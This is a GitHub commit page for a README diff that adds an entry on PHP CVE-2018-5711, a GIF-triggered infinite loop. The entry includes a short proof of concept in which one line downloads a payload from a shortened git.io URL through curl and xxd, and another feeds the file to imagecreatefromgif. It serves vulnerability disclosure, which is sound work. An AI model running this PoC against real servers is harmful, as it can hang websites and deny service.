Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
add PHP CVE-2018-5711 - Hanging Websites by a Harmful GIF
  • Loading branch information
Mr5m1th committed Jan 28, 2018
1 parent cd780de commit 05f7e24
Showing 1 changed file with 5 additions and 3 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -10,8 +10,10 @@
* PHP 7.2<7.2.1
## POC
```
$ curl -L
$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
$ php -r 'imagecreatefromgif("poc.gif");'
Infinite loop here...
```
## Reference
*
* http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html

0 comments on commit 05f7e24

Please sign in to comment.